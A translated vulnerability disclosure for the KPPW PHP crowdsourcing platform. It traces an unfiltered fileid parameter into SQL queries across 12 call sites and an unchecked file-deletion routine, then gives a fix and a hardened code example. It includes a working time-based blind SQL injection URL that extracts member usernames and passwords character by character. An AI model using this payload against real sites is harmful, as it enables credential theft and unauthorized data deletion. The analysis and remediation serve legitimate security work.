KPPW latest SQL injection vulnerability 8 (a problem in a global file causes 12 injection points and unauthorized operations)

Source: Internet
Author: User


KPPW latest version, SQL injection vulnerability 8: starting from a single problem, a flaw in a globally used file turns out to cause 12 injection points and unauthorized operations.




File /control/pubgoods.php

<?php
kekezu::check_login();
$strPageTitle       = 'Publish item -' . $_K['html_title'];
$strPageKeyword     = 'Publish a commodity,' . $_K['html_title'];
$strPageDescription = $kekezu->_sys_config['index_seo_desc'];
$id   = intval($id);
$step = strval(trim($step));
......
$strUrl = "index.php?do=pubgoods&id=" . $id;
$_SESSION['spread'] = 'index.php?do=pubgoods';
// model_dir selects which shop module's pub.php is loaded
require S_ROOT . "/shop/" . $arrModelInfo['model_dir'] . "/control/pub.php";



In the last line, $arrModelInfo['model_dir'] can be either goods or service.

When $arrModelInfo['model_dir'] is goods, follow the include into this file:

/shop/goods/control/pub.php

<?php
defined('in_kekeke') or exit('Access Denied');
$stdCacheName = 'service_cache_' . $id . '_' . substr(md5($gUid), 0, 6);
$objRelease   = goods_release_class::get_instance($id);
$objRelease->get_service_obj($stdCacheName);
$arrPubInfo = $objRelease->_std_obj->_release_info;
$arrConfig  = $objRelease->_service_config;
$arrPubInfo['indus_pid'] and $arrAllIndustrys = CommonClass::getIndustryByPid($arrPubInfo['indus_pid'], 'indus_id,indus_pid,indus_name');
switch ($step) {
    case 'step1':
        ......
        if ($action == 'delete_image') {
            // $fileid is interpolated unquoted and unfiltered into the IN (...) list
            $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in (%s)", TABLEPRE, $fileid);
            $arrFileInfo = db_factory::get_one($strSql);
            $resText = CommonClass::delFileByFileId($fileid);
            if ($resText) {
                $array  = explode(',', $arrPubInfo['file_id']);
                $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array);
                $_POST['file_id'] = implode(",", $newArr);
                $arrPubInfo and $_POST = array_merge($arrPubInfo, $_POST);
                $objRelease->save_service_obj($_POST, $stdCacheName);
                kekezu::echojson('deleted successfully', 1, array('fileid' => $fileid, 'save_name' => $arrFileInfo['save_name']));
                die;
            }
        }
        if ($action == 'delete_goodsfile') {
            // same pattern: $fileid goes straight into the query
            $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in (%s)", TABLEPRE, $fileid);
            $arrFileInfo = db_factory::get_one($strSql);
            $resText = CommonClass::delFileByFileId($fileid);



When action = delete_image or action = delete_goodsfile, the fileid parameter enters the SQL statement unfiltered and without quotation marks, which causes SQL injection.



Next, the same fileid parameter is also passed to the delFileByFileId function; continue tracking it there:

File /lib/inc/CommonClass.php:

public static function delFileByFileId($fileId)
{
    // first injection point: $fileId interpolated unquoted into the SELECT
    $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)", TABLEPRE, $fileId);
    $arrFileInfo = db_factory::get_one($strSql);
    $filename = S_ROOT . $arrFileInfo['save_name'];
    if (file_exists($filename)) {
        unlink($filename);
    }
    // second injection point: $fileId concatenated into the DELETE; no owner check
    return db_factory::execute("delete from " . TABLEPRE . "witkey_file where file_id = " . $fileId);
}



Here fileid again enters both the select and the delete statement without any filtering or protection, giving two more injection points.



This function is used when a user deletes an image from a product or task they published: at the end of the operation the file is deleted based on fileid alone. The owner of the file being deleted is never checked, so files uploaded by any user can be deleted at will, which is an unauthorized operation.



Next, let's look at /lib/inc/CommonClass.php, which holds globally called functions.

Let's see how many files call the delFileByFileId function from /lib/inc/CommonClass.php.




We can see that 12 files call the delFileByFileId function. Let's pick two of the other files and check whether the fileid parameter they pass to delFileByFileId is processed at all.

The first file, /control/taskhandle.php:

case 'workover':
    if (isset($formhash) && kekezu::submitcheck($formhash)) {
        $resText = $objTask->work_over($tarContent, $file_id, intval($modify));
        if ($resText == true) {
            kekezu::show_msg('Operation successful', 'index.php?do=task&id=' . $taskId, 3, NULL, 'ok');
        } else {
            kekezu::show_msg($resText, 'index.php?do=task&id=' . $taskId, 3, NULL, 'fail');
        }
    }
    if ($action == 'deletefile') {
        // $fileid is handed to delFileByFileId exactly as received
        $resText = CommonClass::delFileByFileId($fileid);
        if ($resText) {
            kekezu::echojson('deleted successfully', 1, array('fileid' => $fileid));
            die;
        }
    }



fileid is not processed anywhere in this file, so once it enters the delFileByFileId function it causes injection here as well.

The remaining call sites are not listed one by one.

Wherever fileid is passed unprocessed into delFileByFileId, it reaches the select and delete statements, resulting in SQL injection and in the unauthorized deletion of arbitrary users' files.

SQL injection vulnerability:

http://localhost/KPPW2520141118UTF-8/index.php?do=pubgoods&step=step1&action=delete_image&fileid=5566)+and+1=if(mid((select+concat(username,password)+from+keke_witkey_member+limit+0,1),1,1)=char(97),sleep(5),2)%23



The response is delayed by 10 seconds.

Because two select statements are executed with the injected value, sleep(5) runs twice.




Check the database execution results:



The SQL statement is successfully executed.



Here the first character of username+password is 'a'. Continuing in the same way, the complete username and password can be injected; the request can be modified and scripted to do so.

Solution:

Apply intval() to fileid, or wrap it in single quotation marks, before it enters the SQL statement.
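As an added example (not KPPW's own code), the following hardened version of delFileByFileId applies the intval fix from the solution above and goes one step further: the id list is validated to positive integers, the queries use prepared statements instead of string concatenation, and an ownership check is added so that the unauthorized deletion described earlier is closed at the same time. It assumes PDO in place of db_factory and an owner column named uid on witkey_file; neither of these is shown on the page, and the demonstration data at the bottom is constructed.

```php
<?php
// Added example, not KPPW's code. Hardened replacement for
// CommonClass::delFileByFileId. Assumptions: PDO instead of db_factory,
// an owner column `uid` on witkey_file (assumed column name), and the
// page's TABLEPRE / S_ROOT constants.

defined('TABLEPRE') or define('TABLEPRE', 'keke_');
defined('S_ROOT') or define('S_ROOT', sys_get_temp_dir() . '/kppw_demo/');

/**
 * Turn the raw fileid value into a list of positive integers.
 * "12,34" -> [12, 34]; "5566) and sleep(5)#" -> [5566]; "abc" -> [].
 * Only these integers are ever placed in the IN (...) list, so the
 * query can no longer be broken out of.
 */
function normalizeFileIds($fileId): array
{
    $ids = [];
    foreach (explode(',', (string) $fileId) as $part) {
        $n = intval(trim($part));
        if ($n > 0) {
            $ids[$n] = $n;   // keyed by value to drop duplicates
        }
    }
    return array_values($ids);
}

/**
 * Delete the given file ids, but only those owned by $currentUid.
 * Returns the number of database rows removed.
 */
function delFileByFileIdSecure(PDO $pdo, $fileId, int $currentUid): int
{
    $ids = normalizeFileIds($fileId);
    if ($ids === []) {
        return 0;
    }
    $table = TABLEPRE . 'witkey_file';
    $ph    = implode(',', array_fill(0, count($ids), '?'));

    // Ownership is part of the WHERE clause: another user's ids simply match nothing.
    $sel = $pdo->prepare("SELECT file_id, save_name FROM {$table} WHERE uid = ? AND file_id IN ({$ph})");
    $sel->execute(array_merge([$currentUid], $ids));
    $rows = $sel->fetchAll(PDO::FETCH_ASSOC);
    if ($rows === []) {
        return 0;
    }

    $root  = realpath(S_ROOT);
    $owned = [];
    foreach ($rows as $row) {
        $real = realpath(S_ROOT . $row['save_name']);
        // Only unlink regular files that resolve inside the upload root.
        if ($root !== false && $real !== false
            && strpos($real, $root . DIRECTORY_SEPARATOR) === 0 && is_file($real)) {
            unlink($real);
        }
        $owned[] = (int) $row['file_id'];
    }

    $ph  = implode(',', array_fill(0, count($owned), '?'));
    $del = $pdo->prepare("DELETE FROM {$table} WHERE uid = ? AND file_id IN ({$ph})");
    $del->execute(array_merge([$currentUid], $owned));
    return $del->rowCount();
}

// Stand-alone demonstration against an in-memory SQLite database (constructed data).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE " . TABLEPRE . "witkey_file (file_id INTEGER PRIMARY KEY, uid INTEGER, file_name TEXT, save_name TEXT)");
$pdo->exec("INSERT INTO " . TABLEPRE . "witkey_file VALUES (5566, 1, 'a.jpg', 'a.jpg'), (5567, 2, 'b.jpg', 'b.jpg')");

// Input in the shape of the page's payload, sent by user 1: only the integer 5566
// survives validation and the rest of the string never reaches SQL.
var_dump(delFileByFileIdSecure($pdo, "5566) and sleep(5)#", 1));  // int(1): own file removed
// User 1 asking for user 2's file: the ownership clause matches nothing.
var_dump(delFileByFileIdSecure($pdo, '5567', 1));                  // int(0)
```

The integer whitelist alone would already stop the injection; the prepared statement is kept so the query stays safe if the id list is ever replaced by something non-numeric, and the uid condition in both the SELECT and the DELETE is what turns the global helper from "delete any file by id" into "delete my file by id" at every one of its 12 call sites.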
